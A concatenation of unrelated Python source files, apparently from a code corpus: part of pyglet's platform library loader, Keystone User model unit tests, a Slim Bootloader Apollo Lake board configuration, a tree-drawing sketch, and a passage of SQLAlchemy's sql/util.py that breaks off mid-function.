raise ImportError('Library "%s" not found.' % names[0]) def find_library(self, name): return ctypes.util.find_library(name) @staticmethod def load_framework(name): raise RuntimeError("Can't load framework on this platform.") class MachOLibraryLoader(LibraryLoader): def __init__(self): if 'LD_LIBRARY_PATH' in os.environ: self.ld_library_path = os.environ['LD_LIBRARY_PATH'].split(':') else: self.ld_library_path = [] if _local_lib_paths: # search first for local libs self.ld_library_path = _local_lib_paths + self.ld_library_path os.environ['LD_LIBRARY_PATH'] = ':'.join(self.ld_library_path) if 'DYLD_LIBRARY_PATH' in os.environ: self.dyld_library_path = os.environ['DYLD_LIBRARY_PATH'].split(':') else: self.dyld_library_path = [] if 'DYLD_FALLBACK_LIBRARY_PATH' in os.environ: self.dyld_fallback_library_path = os.environ['DYLD_FALLBACK_LIBRARY_PATH'].split(':') else: self.dyld_fallback_library_path = [os.path.expanduser('~/lib'), '/usr/local/lib', '/usr/lib'] def find_library(self, path): """Implements the dylib search as specified in Apple documentation: http://developer.apple.com/library/content/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/DynamicLibraryUsageGuidelines.html Before commencing the standard search, the method first checks the bundle's ``Frameworks`` directory if the application is running within a bundle (OS X .app). """ libname = os.path.basename(path) search_path = [] if '.dylib' not in libname: libname = 'lib' + libname + '.dylib' # py2app support if getattr(sys, 'frozen', None) == 'macosx_app' and 'RESOURCEPATH' in os.environ: search_path.append(os.path.join(os.environ['RESOURCEPATH'], '..', 'Frameworks', libname)) # conda support if os.environ.get('CONDA_PREFIX', False): search_path.append(os.path.join(os.environ['CONDA_PREFIX'], 'lib', libname)) # pyinstaller.py sets sys.frozen to True, and puts dylibs in # Contents/MacOS, which path pyinstaller puts in sys._MEIPASS if (hasattr(sys, 'frozen') and hasattr(sys, '_MEIPASS') and sys.frozen is True and pyglet.compat_platform == 'darwin'): search_path.append(os.path.join(sys._MEIPASS, libname)) if '/' in path: search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path]) search_path.append(path) search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path]) else: search_path.extend([os.path.join(p, libname) for p in self.ld_library_path]) search_path.extend([os.path.join(p, libname) for p in self.dyld_library_path]) search_path.append(path) search_path.extend([os.path.join(p, libname) for p in self.dyld_fallback_library_path]) for path in search_path: if os.path.exists(path): return path return None @staticmethod def load_framework(name): path = ctypes.util.find_library(name) # Hack for compatibility with macOS > 11.0 if path is None: frameworks = { 'AGL': '/System/Library/Frameworks/AGL.framework/AGL', 'IOKit': '/System/Library/Frameworks/IOKit.framework/IOKit', 'OpenAL': '/System/Library/Frameworks/OpenAL.framework/OpenAL', 'OpenGL': '/System/Library/Frameworks/OpenGL.framework/OpenGL' } path = frameworks.get(name) if path: lib = ctypes.cdll.LoadLibrary(path) if _debug_lib: print(path) if _debug_trace: lib = _TraceLibrary(lib) return lib raise ImportError("Can't find framework %s." % name) class LinuxLibraryLoader(LibraryLoader): _ld_so_cache = None _local_libs_cache = None @staticmethod def _find_libs(directories): cache = {} lib_re = re.compile(r'lib(.*)\.so(?:$|\.)') for directory in directories: try: for file in os.listdir(directory): match = lib_re.match(file) if match: # Index by filename path = os.path.join(directory, file) if file not in cache: cache[file] = path # Index by library name library = match.group(1) if library not in cache: cache[library] = path except OSError: pass return cache def _create_ld_so_cache(self): # Recreate search path followed by ld.so. This is going to be # slow to build, and incorrect (ld.so uses ld.so.cache, which may # not be up-to-date). Used only as fallback for distros without # /sbin/ldconfig. # # We assume the DT_RPATH and DT_RUNPATH binary sections are omitted. directories = [] try: directories.extend(os.environ['LD_LIBRARY_PATH'].split(':')) except KeyError: pass try: with open('/etc/ld.so.conf') as fid: directories.extend([dir.strip() for dir in fid]) except IOError: pass directories.extend(['/lib', '/usr/lib']) self._ld_so_cache = self._find_libs(directories) def find_library(self, path): # search first for local libs if _local_lib_paths: if not self._local_libs_cache: self._local_libs_cache = self._find_libs(_local_lib_paths) if path in self._local_libs_cache: return self._local_libs_cache[path] # ctypes tries ldconfig, gcc and objdump. If none of these are # present, we implement the ld-linux.so search path as described in # the man page. result = ctypes.util.find_library(path) if result: return result if self._ld_so_cache is None: self._create_ld_so_cache() return self._ld_so_cache.get(path) if pyglet.compat_platform == 'darwin': loader = MachOLibraryLoader() elif pyglet.compat_platform.startswith('linux'): loader = LinuxLibraryLoader() else: loader = LibraryLoader() load_library = loader.load_library
py
1a3f7c4f83eafe11b94ed9229bdaf3d09094b064
import json from lxml import etree import unittest2 as unittest from keystone.models import User from keystone.test import utils as testutils class TestModelsUser(unittest.TestCase): '''Unit tests for keystone/models.py:User class.''' def test_user(self): user = User() self.assertEquals(str(user.__class__), "<class 'keystone.models.User'>", "user should be of instance " "class keystone.models.User but instead " "was '%s'" % str(user.__class__)) self.assertIsInstance(user, dict, "") def test_user_static_properties(self): user = User(id=1, name="the user", blank=None) self.assertEquals(user.id, 1) self.assertEquals(user.name, "the user") self.assertRaises(AttributeError, getattr, user, 'some_bad_property') def test_user_properties(self): user = User(id=1, name="the user", blank=None) user["dynamic"] = "test" self.assertEquals(user["dynamic"], "test") def test_user_json_serialization(self): user = User(id=1, name="the user", blank=None) user["dynamic"] = "test" json_str = user.to_json() d1 = json.loads(json_str) d2 = json.loads('{"user": {"name": "the user", \ "id": 1, "dynamic": "test"}}') self.assertDictEqual(d1, d2) def test_user_xml_serialization(self): user = User(id=1, name="the user", blank=None) xml_str = user.to_xml() self.assertTrue(testutils.XMLTools.xmlEqual(xml_str, '<user name="the user" id="1"/>')) def test_user_json_deserialization(self): user = User.from_json('{"name": "the user", "id": 1}', hints={"contract_attributes": ['id', 'name']}) self.assertIsInstance(user, User) self.assertEquals(user.id, 1) self.assertEquals(user.name, "the user") def test_user_xml_deserialization(self): user = User(id=1, name="the user", blank=None) self.assertIsInstance(user, User) def test_user_inspection(self): user = User(id=1, name="the user", blank=None) self.assertFalse(user.inspect()) def test_user_validation(self): user = User(id=1, name="the user", blank=None) self.assertTrue(user.validate()) if __name__ == '__main__': unittest.main()
py
1a3f7c7ebac358e36e7c43b36edd46a5b0269f29
## @file # This file is used to provide board specific image information. # # Copyright (c) 2017 - 2020, Intel Corporation. All rights reserved.<BR> # # SPDX-License-Identifier: BSD-2-Clause-Patent # ## # Import Modules # import os import sys sys.dont_write_bytecode = True sys.path.append (os.path.join('..', '..')) from BuildLoader import FLASH_MAP, BaseBoard, STITCH_OPS from BuildLoader import IPP_CRYPTO_OPTIMIZATION_MASK, IPP_CRYPTO_ALG_MASK # # Temporary Memory Layout for APL # # FF000000 +--------------------------+ # | Stage1B | # | (Decompressed) | # FEF80000 +--------------------------+ # | Stage1 Heap/Stack | # FEF70000 +--------------------------+ # | Not Used | # +-------------+------------+ # | Free | # | |------------| # +-------------+ MRC NVS | # | | | # FEF40000 +- Stage1B -+------------+ # | Compressed | FSP Mem | # FEF16000 | +------------+ # | | | # FEF10000 --------------+------------+ # | N/A (Don't use) | # FEF08000 +--------------------------+ # | Stage1A | # FEF00000 +--------------------------+ # class Board(BaseBoard): def __init__(self, *args, **kwargs): super(Board, self).__init__(*args, **kwargs) self.VERINFO_IMAGE_ID = 'SB_APLI ' self.VERINFO_PROJ_MAJOR_VER = 1 self.VERINFO_PROJ_MINOR_VER = 0 self.VERINFO_SVN = 1 self.VERINFO_BUILD_DATE = '05/20/2018' self.BOARD_NAME = 'apl' self.BOARD_PKG_NAME = 'ApollolakeBoardPkg' self.SILICON_PKG_NAME = 'ApollolakePkg' self._PCI_ENUM_DOWNGRADE_PMEM64 = 1 self.PCI_IO_BASE = 0x00001000 self.PCI_MEM32_BASE = 0x80000000 self.PCI_MEM64_BASE = 0x400000000 self.FLASH_SIZE = 0x800000 self.FLASH_BASE = self.FLASH_LAYOUT_START - self.FLASH_SIZE self.HAVE_VBT_BIN = 1 self.HAVE_VERIFIED_BOOT = 1 self.HAVE_MEASURED_BOOT = 0 self.HAVE_SEED_LIST = 0 self.HAVE_PSD_TABLE = 1 self.ENABLE_SMBIOS = 1 self.ENABLE_FSP_LOAD_IMAGE = 0 self.ENABLE_VTD = 1 self.ENABLE_FWU = 1 self.ENABLE_SPLASH = 1 self.ENABLE_FRAMEBUFFER_INIT = 1 self.ENABLE_GRUB_CONFIG = 1 self.ENABLE_DMA_PROTECTION = 0 # G9 for 384 | W7 Opt for SHA384| Ni Opt for SHA256| V8 Opt for SHA256 self.ENABLE_CRYPTO_SHA_OPT = IPP_CRYPTO_OPTIMIZATION_MASK['SHA256_NI'] # To enable source debug, set 1 to self.ENABLE_SOURCE_DEBUG # self.ENABLE_SOURCE_DEBUG = 1 # Temporary skip Stage1A due to 32KB(IBBL) size limitation # until library size optimization has done. # If ENABLE_SOURCE_DEBUG is disabled, SKIP_STAGE1A_SOURCE_DEBUG will be ignored self.SKIP_STAGE1A_SOURCE_DEBUG = 1 # BIT0:Serial BIT1:USB KB # Support serial port input console by default self.CONSOLE_IN_DEVICE_MASK = 0x00000001 # BIT0:Serial BIT1:GFX self.CONSOLE_OUT_DEVICE_MASK = 0x00000001 # Mem | NVMe | Usb | Spi | Ufs | eMMC | SD | Sata self.BOOT_MEDIA_SUPPORT_MASK = 0xBF # EXT | FAT self.FILE_SYSTEM_SUPPORT_MASK = 3 # Verify required minimum FSP version self.MIN_FSP_REVISION = 0x01040301 # Verify FSP image ID. Empty string means skipping verification self.FSP_IMAGE_ID = '$APLFSP$' self.STAGE1A_SIZE = 0x00008000 self.STAGE1B_SIZE = 0x00035000 if self.ENABLE_SOURCE_DEBUG: self.STAGE1B_SIZE += 0x2000 self.STAGE2_SIZE = 0x00032000 self.PAYLOAD_SIZE = 0x0001F000 if len(self._PAYLOAD_NAME.split(';')) > 1: # EPAYLOAD is specified self.EPAYLOAD_SIZE = 0x00130000 self.UEFI_VARIABLE_SIZE = 0x00040000 else: # EPAYLOAD does not exist, create a dummy one self.EPAYLOAD_SIZE = 0x1000 self.UEFI_VARIABLE_SIZE = 0x1000 if self.FSPDEBUG_MODE == 1: self.STAGE1B_SIZE += 0x00009000 self.STAGE2_SIZE += 0x0000F000 self.STAGE1A_XIP = 0 self.STAGE1A_LOAD_BASE = 0xFEF00000 self.STAGE1B_XIP = 0 self.STAGE1B_LOAD_BASE = 0xFEF10000 self.STAGE1B_FD_BASE = 0xFEF80000 self.STAGE1B_FD_SIZE = 0x0006B000 if self.RELEASE_MODE == 0: self.STAGE1B_FD_SIZE += 0x00002000 self.PAYLOAD_SIZE += 0x00005000 # For Stage2, it is always compressed. # if STAGE2_LOAD_HIGH is 1, STAGE2_FD_BASE will be ignored self.STAGE2_FD_BASE = 0x01000000 self.STAGE2_FD_SIZE = 0x00080000 self.STAGE2_LOAD_BASE = 0x00100000 self.STAGE1_STACK_SIZE = 0x00002000 self.STAGE1_DATA_SIZE = 0x0000E000 # Offset is relative to the temporary memory base 0xFEF00000 self.STAGE1_STACK_BASE_OFFSET = 0x00080000 - (self.STAGE1_STACK_SIZE + self.STAGE1_DATA_SIZE) # To support large payload such as UEFI self.LOADER_RSVD_MEM_SIZE = 0x00B8C000 self.PLD_RSVD_MEM_SIZE = 0x00500000 self.PLD_HEAP_SIZE = 0x04000000 self.FWUPDATE_SIZE = 0x00020000 self.CFGDATA_SIZE = 0x00004000 self.KEYHASH_SIZE = 0x00001000 self.CFG_DATABASE_SIZE = self.CFGDATA_SIZE self.MRCDATA_SIZE = 0x00004000 self.VARIABLE_SIZE = 0x00002000 self.S3_DEBUG = 0 self.SBLRSVD_SIZE = 0x00001000 if len(self._PAYLOAD_NAME.split(';')) > 1: self.SPI_IAS1_SIZE = 0x00001000 else: self.SPI_IAS1_SIZE = 0x00150000 self._CFGDATA_INT_FILE = ['CfgData_Int_LeafHill.dlt'] self._CFGDATA_EXT_FILE = ['CfgData_Ext_Gpmrb.dlt', 'CfgData_Ext_Up2.dlt','CfgData_Ext_OxbHill.dlt','CfgData_Ext_MB3.dlt','CfgData_Ext_JuniperHill.dlt'] # If mulitple VBT table support is required, list them as: # {VbtImageId1 : VbtFileName1, VbtImageId2 : VbtFileName2, ...} # VbtImageId is ID to identify a VBT image. It is a UINT32 number to match # the ImageId field in the VBT container. # VbtFileName is the VBT file name. It needs to be located under platform # VbtBin folder. self._MULTI_VBT_FILE = {1:'Vbt.dat', 2:'Vbt_Up2.dat'} def GetPlatformDsc (self): dsc = {} common_libs = [ 'LoaderLib|Platform/$(BOARD_PKG_NAME)/Library/LoaderLib/LoaderLib.inf', 'SerialPortLib|Silicon/$(SILICON_PKG_NAME)/Library/SerialPortLib/SerialPortLib.inf', 'SocInfoLib|Silicon/$(SILICON_PKG_NAME)/Library/SocInfoLib/SocInfoLib.inf', 'PlatformHookLib|Silicon/$(SILICON_PKG_NAME)/Library/PlatformHookLib/PlatformHookLib.inf', 'ScSbiAccessLib|Silicon/$(SILICON_PKG_NAME)/Library/ScSbiAccessLib/ScSbiAccessLib.inf', 'GpioLib|Silicon/$(SILICON_PKG_NAME)/Library/GpioLib/GpioLib.inf', 'PchSpiLib|Silicon/CommonSocPkg/Library/PchSpiLib/PchSpiLib.inf', 'SpiFlashLib|Silicon/CommonSocPkg/Library/SpiFlashLib/SpiFlashLib.inf', 'IgdOpRegionLib|Silicon/$(SILICON_PKG_NAME)/Library/IgdOpRegionLib/IgdOpRegionLib.inf', 'IocIpcLib|Platform/$(BOARD_PKG_NAME)/Library/IocIpcLib/IocIpcLib.inf', 'BootGuardLib|Silicon/$(SILICON_PKG_NAME)/Library/BootGuardLib20/BootGuardLib20.inf', 'HeciLib|Silicon/ApollolakePkg/Library/HeciLib/HeciLib.inf', 'PsdLib|Silicon/ApollolakePkg/Library/PsdLib/PsdLib.inf', 'ShellExtensionLib|Platform/$(BOARD_PKG_NAME)/Library/ShellExtensionLib/ShellExtensionLib.inf', 'BootMediaLib|Silicon/ApollolakePkg/Library/BootMediaLib/BootMediaLib.inf', 'FlashDescriptorLib|Silicon/ApollolakePkg/Library/FlashDescriptorLib/FlashDescriptorLib.inf', 'VtdLib|Silicon/$(SILICON_PKG_NAME)/Library/VtdLib/VtdLib.inf', 'SmbusLib|Silicon/$(SILICON_PKG_NAME)/Library/SmbusLib/SmbusLib.inf', 'HdaLib|Platform/$(BOARD_PKG_NAME)/Library/HdaLib/HdaLib.inf', 'VtdPmrLib|Silicon/CommonSocPkg/Library/VtdPmrLib/VtdPmrLib.inf', 'BaseIpcLib|Silicon/$(SILICON_PKG_NAME)/Library/BaseIpcLib/BaseIpcLib.inf' ] dsc['LibraryClasses.%s' % self.BUILD_ARCH] = common_libs return dsc def GetFlashMapList (self): img_list = self.GetImageLayout () comp_list = [] offset = 0 # Skip Stitch_IPAD and Stitch_OPAD for flash map for img in img_list[2:][::-1]: child = img[1][0] if child[3] & STITCH_OPS.MODE_FILE_IGNOR: continue bname = os.path.splitext(child[0])[0] comp = {'name':child[0], 'bname':bname, 'offset':offset, 'size':child[2], 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['COMPRESSED'] if child[1] else 0} if bname in ['STAGE1A', 'STAGE1B', 'STAGE2', 'FWUPDATE', 'CFGDATA', 'MRCDATA', 'PAYLOAD', 'VARIABLE']: comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT'] else: comp['flag'] |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT'] comp_list.append (comp) offset += child[2] flag = FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT'] comp_list.append ({'name':'SBLRSVD.bin','bname':'SBLRSVD','offset':0, 'size':self.SBLRSVD_SIZE, 'flag': FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']}) comp_list.append ({'name':'BPM.bin', 'bname':'BPM', 'offset':0, 'size':0, 'flag': flag}) return comp_list[::-1] def GetOutputImages (self): # define extra images that will be copied to output folder img_list = ['SlimBootloader.txt', 'CfgDataStitch.py', 'CfgDataDef.yaml', 'CfgDataInt.bin' ] return img_list def GetKeyHashList (self): # Define a set of new key used for different purposes # The key is either key id or public key PEM format or private key PEM format pub_key_list = [ ( # Key for verifying Config data blob HASH_USAGE['PUBKEY_CFG_DATA'], 'KEY_ID_CFGDATA' + '_' + self._RSA_SIGN_TYPE ), ( # Key for verifying firmware update HASH_USAGE['PUBKEY_FWU'], 'KEY_ID_FIRMWAREUPDATE' + '_' + self._RSA_SIGN_TYPE ), ( # Key for verifying container header HASH_USAGE['PUBKEY_CONT_DEF'], 'KEY_ID_CONTAINER' + '_' + self._RSA_SIGN_TYPE ), ( # key for veryfying OS image. HASH_USAGE['PUBKEY_OS'], 'KEY_ID_OS1_PUBLIC' + '_' + self._RSA_SIGN_TYPE ), ] return pub_key_list def GetImageLayout (self): ias1_flag = 0 if self.SPI_IAS1_SIZE > 0 else STITCH_OPS.MODE_FILE_IGNOR fwu_flag = 0 if self.ENABLE_FWU else STITCH_OPS.MODE_FILE_IGNOR img_list = [] img_list.extend ([ # Padding to ensure all other components in OBB partition will be aligned at 4KB boundary # 0xB00 assumes (IBBP.man, BPM.met) + (IPAD, IBBL, IBBM, OBB, FWUP, CFGD, PLD, VAR, MRCD) in BpdtIBB # 0x180 assumes (OPAD, PROV, EPLD) in BpdtOBB # If more files are added, the offset needs to be adjusted accordingly ('Stitch_IPAD.bin', [ ('PADDING.bin', '', 0xB00, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_OPAD.bin', [ ('PADDING.bin', '', 0x180, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_FWU.bin', [ ('FWUPDATE.bin' , 'Lzma', self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_FB.bin', [ ('SPI_IAS1.bin', '', self.SPI_IAS1_SIZE, STITCH_OPS.MODE_FILE_PAD | ias1_flag, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_PLD.bin', [ ('PAYLOAD.bin', 'Lz4', self.PAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_VAR.bin', [ ('VARIABLE.bin', '', self.VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_MRCDATA.bin', [ ('MRCDATA.bin', '', self.MRCDATA_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_CFGDATA.bin', [ ('CFGDATA.bin', '', self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_KEYHASH.bin', [ ('KEYHASH.bin', '', self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_OBB.bin', [ ('STAGE2.fd', 'Lz4', self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_IBBM.bin', [ ('STAGE1B.fd', 'Lz4', self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_IBBL.bin', [ ('STAGE1A.fd', '', self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_EPLD.bin', [ ('EPAYLOAD.bin', '', self.EPAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)] ), ('Stitch_UVAR.bin', [ ('UEFIVARIABLE.bin', '', self.UEFI_VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)], ), ]) return img_list
py
1a3f7d233b700bf20b859088661edd66b35a9b84
from gen import Tree from demo_trees import trees import ws1 reload(ws1) from ws1 import layout t = layout(trees[4]) r = 30 rh = r*1.5 rw = r*1.5 stroke(0) def drawt(root, depth): global r oval(root.x * rw, depth * rh, r, r) print root.x for child in root.children: drawt(child, depth+1) def drawconn(root, depth): for child in root.children: line(root.x * rw + (r/2), depth * rh + (r/2), child.x * rw + (r/2), (depth+1) * rh + (r/2)) drawconn(child, depth+1) size(1000, 500) translate(2, 2) stroke(0) drawconn(t, 0) fill(1,1,1) drawt(t, 0)
py
1a3f7d2f8fdf299395daf5de798143893734973b
# sql/util.py # Copyright (C) 2005-2011 the SQLAlchemy authors and contributors <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: http://www.opensource.org/licenses/mit-license.php from sqlalchemy import exc, schema, util, sql, types as sqltypes from sqlalchemy.util import topological from sqlalchemy.sql import expression, operators, visitors from itertools import chain """Utility functions that build upon SQL and Schema constructs.""" def sort_tables(tables): """sort a collection of Table objects in order of their foreign-key dependency.""" tables = list(tables) tuples = [] def visit_foreign_key(fkey): if fkey.use_alter: return parent_table = fkey.column.table if parent_table in tables: child_table = fkey.parent.table if parent_table is not child_table: tuples.append((parent_table, child_table)) for table in tables: visitors.traverse(table, {'schema_visitor':True}, {'foreign_key':visit_foreign_key}) tuples.extend( [parent, table] for parent in table._extra_dependencies ) return list(topological.sort(tuples, tables)) def find_join_source(clauses, join_to): """Given a list of FROM clauses and a selectable, return the first index and element from the list of clauses which can be joined against the selectable. returns None, None if no match is found. e.g.:: clause1 = table1.join(table2) clause2 = table4.join(table5) join_to = table2.join(table3) find_join_source([clause1, clause2], join_to) == clause1 """ selectables = list(expression._from_objects(join_to)) for i, f in enumerate(clauses): for s in selectables: if f.is_derived_from(s): return i, f else: return None, None def find_tables(clause, check_columns=False, include_aliases=False, include_joins=False, include_selects=False, include_crud=False): """locate Table objects within the given expression.""" tables = [] _visitors = {} if include_selects: _visitors['select'] = _visitors['compound_select'] = tables.append if include_joins: _visitors['join'] = tables.append if include_aliases: _visitors['alias'] = tables.append if include_crud: _visitors['insert'] = _visitors['update'] = \ _visitors['delete'] = lambda ent: tables.append(ent.table) if check_columns: def visit_column(column): tables.append(column.table) _visitors['column'] = visit_column _visitors['table'] = tables.append visitors.traverse(clause, {'column_collections':False}, _visitors) return tables def find_columns(clause): """locate Column objects within the given expression.""" cols = util.column_set() visitors.traverse(clause, {}, {'column':cols.add}) return cols def clause_is_present(clause, search): """Given a target clause and a second to search within, return True if the target is plainly present in the search without any subqueries or aliases involved. Basically descends through Joins. """ stack = [search] while stack: elem = stack.pop() if clause is elem: return True elif isinstance(elem, expression.Join): stack.extend((elem.left, elem.right)) return False def bind_values(clause): """Return an ordered list of "bound" values in the given clause. E.g.:: >>> expr = and_( ... table.c.foo==5, table.c.foo==7 ... ) >>> bind_values(expr) [5, 7] """ v = [] def visit_bindparam(bind): value = bind.value # evaluate callables if callable(value): value = value() v.append(value) visitors.traverse(clause, {}, {'bindparam':visit_bindparam}) return v def _quote_ddl_expr(element): if isinstance(element, basestring): element = element.replace("'", "''") return "'%s'" % element else: return repr(element) def expression_as_ddl(clause): """Given a SQL expression, convert for usage in DDL, such as CREATE INDEX and CHECK CONSTRAINT. Converts bind params into quoted literals, column identifiers into detached column constructs so that the parent table identifier is not included. """ def repl(element): if isinstance(element, expression._BindParamClause): return expression.literal_column(_quote_ddl_expr(element.value)) elif isinstance(element, expression.ColumnClause) and \ element.table is not None: return expression.column(element.name) else: return None return visitors.replacement_traverse(clause, {}, repl) def adapt_criterion_to_null(crit, nulls): """given criterion containing bind params, convert selected elements to IS NULL.""" def visit_binary(binary): if isinstance(binary.left, expression._BindParamClause) and binary.left.key in nulls: # reverse order if the NULL is on the left side binary.left = binary.right binary.right = expression.null() binary.operator = operators.is_ binary.negate = operators.isnot elif isinstance(binary.right, expression._BindParamClause) and binary.right.key in nulls: binary.right = expression.null() binary.operator = operators.is_ binary.negate = operators.isnot return visitors.cloned_traverse(crit, {}, {'binary':visit_binary}) def join_condition(a, b, ignore_nonexistent_tables=False, a_subset=None): """create a join condition between two tables or selectables. e.g.:: join_condition(tablea, tableb) would produce an expression along the lines of:: tablea.c.id==tableb.c.tablea_id The join is determined based on the foreign key relationships between the two selectables. If there are multiple ways to join, or no way to join, an error is raised. :param ignore_nonexistent_tables: Deprecated - this flag is no longer used. Only resolution errors regarding the two given tables are propagated. :param a_subset: An optional expression that is a sub-component of ``a``. An attempt will be made to join to just this sub-component first before looking at the full ``a`` construct, and if found will be successful even if there are other ways to join to ``a``. This allows the "right side" of a join to be passed thereby providing a "natural join". """ crit = [] constraints = set() for left in (a_subset, a): if left is None: continue for fk in sorted( b.foreign_keys, key=lambda fk:fk.parent._creation_order): try: col = fk.get_referent(left) except exc.NoReferenceError, nrte: if nrte.table_name == left.name: raise else: continue if col is not None: crit.append(col == fk.parent) constraints.add(fk.constraint) if left is not b: for fk in sorted( left.foreign_keys, key=lambda fk:fk.parent._creation_order): try: col = fk.get_referent(b) except exc.NoReferenceError, nrte: if nrte.table_name == b.name: raise else: # this is totally covered. can't get # coverage to mark it. continue if col is not None: crit.append(col == fk.parent) constraints.add(fk.constraint) if crit: break if len(crit) == 0: if isinstance(b, expression._FromGrouping): hint = " Perhaps you meant to convert the right side to a "\ "subquery using alias()?" else: hint = "" raise exc.ArgumentError( "Can't find any foreign key relationships " "between '%s' and '%s'.%s" % (a.description, b.description, hint)) elif len(constraints) > 1: raise exc.ArgumentError( "Can't determine join between '%s' and '%s'; " "tables have more than one foreign key " "constraint relationship between them. " "Please specify the 'onclause' of this " "join explicitly." % (a.description, b.description)) elif len(crit) == 1: return (crit[0]) else: return sql.and_(*crit) class Annotated(object): """clones a ClauseElement and applies an 'annotations' dictionary. Unlike regular clones, this clone also mimics __hash__() and __cmp__() of the original element so that it takes its place in hashed collections. A reference to the original element is maintained, for the important reason of keeping its hash value current. When GC'ed, the hash value may be reused, causing conflicts. """ def __new__(cls, *args): if not args: # clone constructor return object.__new__(cls) else: element, values = args # pull appropriate subclass from registry of annotated # classes try: cls = annotated_classes[element.__class__] except KeyError: cls = annotated_classes[element.__class__] = type.__new__(type, "Annotated%s" % element.__class__.__name__, (Annotated, element.__class__), {}) return object.__new__(cls) def __init__(self, element, values): # force FromClause to generate their internal # collections into __dict__ if isinstance(element, expression.FromClause): element.c self.__dict__ = element.__dict__.copy() self.__element = element self._annotations = values def _annotate(self, values): _values = self._annotations.copy() _values.update(values) clone = self.__class__.__new__(self.__class__) clone.__dict__ = self.__dict__.copy() clone._annotations = _values return clone def _deannotate(self): return self.__element def _compiler_dispatch(self, visitor, **kw): return self.__element.__class__._compiler_dispatch(self, visitor, **kw) @property def _constructor(self): return self.__element._constructor def _clone(self): clone = self.__element._clone() if clone is self.__element: # detect immutable, don't change anything return self else: # update the clone with any changes that have occurred # to this object's __dict__. clone.__dict__.update(self.__dict__) return Annotated(clone, self._annotations) def __hash__(self): return hash(self.__element) def __cmp__(self, other): return cmp(hash(self.__element), hash(other)) # hard-generate Annotated subclasses. this technique # is used instead of on-the-fly types (i.e. type.__new__()) # so that the resulting objects are pickleable. annotated_classes = {} for cls in expression.__dict__.values() + [schema.Column, schema.Table]: if isinstance(cls, type) and issubclass(cls, expression.ClauseElement): exec "class Annotated%s(Annotated, cls):\n" \ " pass" % (cls.__name__, ) in locals() exec "annotated_classes[cls] = Annotated%s" % (cls.__name__) def _deep_annotate(element, annotations, exclude=None): """Deep copy the given ClauseElement, annotating each element with the given annotations dictionary. Elements within the exclude collection will be cloned but not annotated. """ def clone(elem): # check if element is present in the exclude list. # take into account proxying relationships. if exclude and \ hasattr(elem, 'proxy_set') and \ elem.proxy_set.intersection(exclude): elem = elem._clone() elif annotations != elem._annotations: elem = elem._annotate(annotations.copy()) elem._copy_internals(clone=clone) return elem if element is not None: element = clone(element) return element def _deep_deannotate(element): """Deep copy the given element, removing all annotations.""" def clone(elem): elem = elem._deannotate() elem._copy_internals(clone=clone) return elem if element is not None: element = clone(element) return element def splice_joins(left, right, stop_on=None): if left is None: return right stack = [(right, None)] adapter = ClauseAdapter(left) ret = None while stack: (right, prevright) = stack.pop() if isinstance(right, expression.Join) and right is not stop_on: right = right._clone() right._reset_exported() right.onclause = adapter.traverse(right.onclause) stack.append((right.left, right)) else: right = adapter.traverse(right) if prevright is not None: prevright.left = right if ret is None: ret = right return ret def reduce_columns(columns, *clauses, **kw): """given a list of columns, return a 'reduced' set based on natural equivalents. the set is reduced to the smallest list of columns which have no natural equivalent present in the list. A "natural equivalent" means that two columns will ultimately represent the same value because they are related by a foreign key. \*clauses is an optional list of join clauses which will be traversed to further identify columns that are "equivalent". \**kw may specify 'ignore_nonexistent_tables' to ignore foreign keys whose tables are not yet configured. This function is primarily used to determine the most minimal "primary key" from a selectable, by reducing the set of primary key columns present in the the selectable to just those that are not repeated. """ ignore_nonexistent_tables = kw.pop('ignore_nonexistent_tables', False) columns = util.ordered_column_set(columns) omit = util.column_set() for col in columns: for fk in chain(*[c.foreign_keys for c in col.proxy_set]): for c in columns: if c is col: continue try: fk_col = fk.column except exc.NoReferencedTableError: if ignore_nonexistent_tables: continue else: raise if fk_col.shares_lineage(c): omit.add(col) break if clauses: def visit_binary(binary): if binary.operator == operators.eq: cols = util.column_set(chain(*[c.proxy_set for c in columns.difference(omit)])) if binary.left in cols and binary.right in cols: for c in columns: if c.shares_lineage(binary.right): omit.add(c) break for clause in clauses: visitors.traverse(clause, {}, {'binary':visit_binary}) return expression.ColumnSet(columns.difference(omit)) def criterion_as_pairs(expression, consider_as_foreign_keys=None, consider_as_referenced_keys=None, any_operator=False): """traverse an expression and locate binary criterion pairs.""" if consider_as_foreign_keys and consider_as_referenced_keys: raise exc.ArgumentError("Can only specify one of " "'consider_as_foreign_keys' or " 